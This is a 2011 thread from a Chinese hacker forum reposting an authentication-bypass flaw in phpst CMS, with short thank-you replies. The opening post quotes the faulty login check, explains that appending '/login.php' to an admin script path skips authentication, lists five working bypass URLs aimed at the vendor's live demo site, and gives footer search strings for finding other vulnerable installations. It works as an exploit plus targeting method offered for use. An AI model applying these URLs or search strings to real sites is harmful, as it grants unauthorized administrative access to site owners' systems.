设为首页收藏本站
查看: 1496|回复: 7

[转载]phpst cms管理后台认证漏洞

[复制链接]
  • TA的每日心情
    郁闷
    2012-4-16 15:11
  • 签到天数: 74 天

    [LV.6]常住居民II

    发表于 2011-4-28 12:07:34 | 显示全部楼层 |阅读模式
    phpst cms是一款免费开源的音乐网站系统。基于PHP语言。
    这次暴出后台认证绕过漏洞。漏洞文件:common.inc.php
    -----------------------------------------------------
    省略不重要的代码```````
    if(!in_array(substr(strrchr($_SERVER['PHP_SELF'],"/"),1),array("login.php","login.php?action=logined")))
    {
    checkLogin();
    }
    省略不重要的代码`````````````````
    ------------------------------------------------------
    比如URL是:http://www.tmdsb.com/tmdsb/tmdsb.php

    那就这样:$_SERVER['PHP_SELF']==’/tmdsb/tmdsb.php’

    问题出在这个验证过程。

    首先截取“/tmdsb/tmdsb.php”中从最后一个“/”开始的位置到结尾的字符串,

    即结果为“tmdsb.php”。然后将“login.php?action=logined”和“login.php”

    创建成一个数组。然后在这个数组中搜索“tmdsb.php”,如果存在,那就登陆进去了……

    利用方式:

    比如后台地址为“http://www.tmdsb.com/admin/”,那么只要提交

    http://www.tmdsb.com.com/admin/”+“文件名”+“/login.php”即可绕过登陆。

    例如官网:
    http://demo.phpstcms.com/admin/member.php/login.php

    http://demo.phpstcms.com/admin/config.php/login.php

    http://demo.phpstcms.com/admin/data.php/login.php

    http://demo.phpstcms.com/admin/server.php/login.php

    http://demo.phpstcms.com/admin/info.php/login.php

    关键字:版权所有© 2009 PHPSTCMS.COM. All Rights Reserved! Powered By phpstcms.com

    或者:Powered By PHPSTCMS
  • TA的每日心情
    开心
    2019-9-19 21:14
  • 签到天数: 735 天

    [LV.9]以坛为家II

    发表于 2011-4-28 12:11:33 | 显示全部楼层 赞助商
    额。。学习这个我喜欢啊
  • TA的每日心情
    慵懒
    2013-8-27 10:13
  • 签到天数: 254 天

    [LV.8]以坛为家I

    发表于 2011-4-28 12:12:11 | 显示全部楼层 赞助商
    这个漏洞看过了!!!!
    但还是感谢分享!!
  • TA的每日心情

    2015-6-26 01:20
  • 签到天数: 268 天

    [LV.8]以坛为家I

    发表于 2011-8-10 15:29:00 | 显示全部楼层
    这个漏洞看过了!!!!

    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2012-5-26 21:15
  • 签到天数: 82 天

    [LV.6]常住居民II

    发表于 2011-8-10 20:41:38 | 显示全部楼层
    果然强大哦
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    郁闷
    2013-10-12 12:42
  • 签到天数: 74 天

    [LV.6]常住居民II

    发表于 2011-8-11 10:33:05 | 显示全部楼层
    回复 mad_sen 的帖子

    新手在此学习了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-3-15 15:14
  • 签到天数: 59 天

    [LV.5]常住居民I

    发表于 2019-2-23 18:41:57 | 显示全部楼层
    感谢楼主分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    4 天前
  • 签到天数: 101 天

    [LV.6]常住居民II

    发表于 2019-11-11 17:50:38 | 显示全部楼层
    感谢楼主分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国红客联盟 

    Processed in 0.122970 second(s), 22 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表